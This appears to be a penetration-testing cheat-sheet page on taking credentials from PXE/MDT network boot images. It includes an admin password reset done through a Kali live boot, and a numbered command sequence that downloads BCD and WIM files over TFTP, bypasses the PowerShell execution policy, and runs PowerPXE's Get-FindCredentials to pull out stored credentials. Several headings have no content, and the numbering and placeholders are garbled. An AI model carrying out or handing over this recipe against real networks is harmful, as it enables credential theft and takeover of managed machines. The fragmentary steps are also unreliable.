Boot Image credentials recovery
Tools:
Unencrypted Boot Mediums
Requirements
Manual Process
NOTE: If using VirtualBox, ensure to install the VirtualBox extension pack otherwise this step may fail to obtain an image from the PXE server.
CAUTION! : Ensure the VM is gracefully shutdown through the windows power options. If the VM is terminated in an ungraceful state you will not have write access to reset the administrator password through a live boot medium.
Save changes and exit
NOTE: Sometimes this process seems to fail. If so try again and ensure the account is unlocked then blank the password again. Save the hive and perform a graceful shutdown in Kali.
PXEThief
Encrypted Boot Mediums
1) Request IP and PXE boot preconfigure details from DHCP ( MDT IP)
2) Use TFTP to request each BCD file and enumerate the configuration for all of them.
3) Use SSH connection
4: tftp -i MDT_IP GET "\tmp\x64{30.....28}.bcd"
5: powershell.exe -executionpolicy bypass
6: Import-Module .\PowerPXE.ps1
7: $bcdfILE = "conf.bcd"
8: Get-WimFile -bcdFile $BCDFile
9: tftp -i MDT_IP GET "PXE\BOOT\IMAGE\LOCATION" pxeboot.wim
10: Get-FindCredentials -WimFile pxeboot.wim
11: VOILA!
Last updated